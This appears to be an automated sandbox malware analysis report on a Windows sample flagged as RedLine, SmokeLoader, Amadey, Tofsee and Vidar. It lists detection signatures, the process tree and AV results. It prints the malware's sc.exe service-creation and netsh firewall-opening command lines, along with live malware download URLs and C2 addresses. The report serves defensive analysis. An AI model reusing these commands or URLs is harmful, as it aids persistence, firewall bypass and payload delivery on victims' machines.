Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6zsU4O4WHq.exe

Overview

General Information

Sample Name:6zsU4O4WHq.exe
Analysis ID:553166
MD5:8abe3174cfd23abb63418dfa64109c7c
SHA1:6370245ac968e309d2916ac9d999797a479b77e4
SHA256:93fddb1a745fec7ae8bc3a7f8d66ce73b1841998e9b0589790e924ff6efb6a05
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Amadey RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 6zsU4O4WHq.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\6zsU4O4WHq.exe" MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
    • 6zsU4O4WHq.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\6zsU4O4WHq.exe" MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 8F12.exe (PID: 4564 cmdline: C:\Users\user\AppData\Local\Temp\8F12.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 216 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • ADC7.exe (PID: 4676 cmdline: C:\Users\user\AppData\Local\Temp\ADC7.exe MD5: E1AF41681888A847863EE17BD63450A0)
        • D08E.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\D08E.exe MD5: E4B33586BFDB5A9CD45F3038B8F4CCBD)
          • cmd.exe (PID: 5824 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kxbxjngj\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 644 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3296 cmdline: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6080 cmdline: C:\Windows\System32\sc.exe" description kxbxjngj "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6532 cmdline: "C:\Windows\System32\sc.exe" start kxbxjngj MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6692 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E09C.exe (PID: 5592 cmdline: C:\Users\user\AppData\Local\Temp\E09C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 6548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6660 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6856 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6960 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7080 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 7136 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 7156 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6760 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • svchost.exe (PID: 7000 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • bahuseh (PID: 5920 cmdline: C:\Users\user\AppData\Roaming\bahuseh MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
    • bahuseh (PID: 4512 cmdline: C:\Users\user\AppData\Roaming\bahuseh MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
  • svchost.exe (PID: 2372 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4204 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4564 -ip 4564 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6840 cmdline: werfault.exe /h /shared Global\80ecccd770424135ad1b1b19d8526adb /t 1684 /p 1612 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 5852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • lsjsgslc.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d"C:\Users\user\AppData\Local\Temp\D08E.exe" MD5: 12C7D1AC6B5167E6CDA092CD7B7313A1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000001D.00000002.410123291.0000000000630000.00000040.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
        0000002E.00000002.415135073.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
          0000001F.00000002.448023169.0000000003A31000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000001D.00000002.409713162.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
              00000015.00000002.370380414.00000000004A0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 15 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                21.1.bahuseh.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  21.0.bahuseh.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    21.0.bahuseh.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      31.2.E09C.exe.3b4f910.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        21.2.bahuseh.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                          Click to see the 16 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Suspect Svchost ActivityShow sources
                          Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6760, ProcessCommandLine: svchost.exe, ProcessId: 7000
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentProcessId: 5640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\, ProcessId: 644
                          Sigma detected: Netsh Port or Application AllowedShow sources
                          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentProcessId: 5640, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6692
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentProcessId: 5640, ProcessCommandLine: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3296

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Antivirus detection for URL or domainShow sources
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exeAvira URL Cloud: Label: malware
                          Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                          Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\E09C.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Source: C:\Users\user\AppData\Local\Temp\lsjsgslc.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: 6zsU4O4WHq.exeReversingLabs: Detection: 51%
                          Multi AV Scanner detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\52A0.exeMetadefender: Detection: 34%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\52A0.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\6687.exeMetadefender: Detection: 29%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\6687.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Local\Temp\8F12.exeMetadefender: Detection: 45%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\8F12.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\9991.exeMetadefender: Detection: 34%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\9991.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\A5E6.exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeReversingLabs: Detection: 44%
                          Machine Learning detection for sampleShow sources
                          Source: 6zsU4O4WHq.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\6687.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\8F12.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\D08E.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\9991.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\A5E6.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\74E0.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\8E93.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\B299.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\52A0.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\bahusehJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\E09C.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\lsjsgslc.exeJoe Sandbox ML: detected
                          Source: 46.2.lsjsgslc.exe.700000.2.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 26.2.ADC7.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 29.3.D08E.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 46.2.lsjsgslc.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 46.3.lsjsgslc.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 26.3.ADC7.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 29.2.D08E.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 46.2.lsjsgslc.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 29.2.D08E.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,26_2_00407470
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,26_2_00404830
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,26_2_00407510
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_00407190 CryptUnprotectData,26_2_00407190
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeCode function: 26_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,26_2_004077A0

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exeUnpacked PE file: 26.2.ADC7.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\D08E.exeUnpacked PE file: 29.2.D08E.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exeUnpacked PE file: 46.2.lsjsgslc.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exeUnpacked PE file: 46.2.lsjsgslc.exe.400000.0.unpack
                          Source: 6zsU4O4WHq.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Users\user\AppData\Local\Temp\8F12.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49780 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49799 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49874 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49892 version: TLS 1.2
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8F12.exe, 00000016.00000000.359364135.0000000000413000.00000002.00020000.sdmp, 8F12.exe, 00000016.00000002.441134145.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.439030652.00000000057A0000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb+ source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.377733738.00000000037D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.377681663.0000000005358000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: C:\josixeyad jeveyoso.pdbh source: 6zsU4O4WHq.exe, 00000000.00000002.248050134.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000000.00000000.241744506.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000001.00000000.246119429.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000002.358671480.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000000.342877581.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000015.00000000.348070416.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: profapi.pdb- source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.379398442.00000000037CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.377717330.00000000037CF000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdbh source: ADC7.exe, 0000001A.00000000.369687028.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\josixeyad jeveyoso.pdb source: 6zsU4O4WHq.exe, 6zsU4O4WHq.exe, 00000000.00000002.248050134.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000000.00000000.241744506.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000001.00000000.246119429.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000002.358671480.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000000.342877581.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000015.00000000.348070416.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: LC:\tiroducelidayu\citakuyar\g.pdbh source: D08E.exe, 0000001D.00000002.411850614.00000000008E2000.00000004.00000001.sdmp, D08E.exe, 0000001D.00000000.379013027.0000000000401000.00000020.00020000.sdmp, lsjsgslc.exe, 0000002E.00000000.409757836.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: combase.pdb! source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: C:\tiroducelidayu\citakuyar\g.pdb source: D08E.exe, 0000001D.00000002.411850614.00000000008E2000.00000004.00000001.sdmp, D08E.exe, 0000001D.00000000.379013027.0000000000401000.00000020.00020000.sdmp, lsjsgslc.exe, 0000002E.00000000.409757836.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdb source: ADC7.exe, 0000001A.00000000.369687028.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.377733738.00000000037D5000.00000004.00000001.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
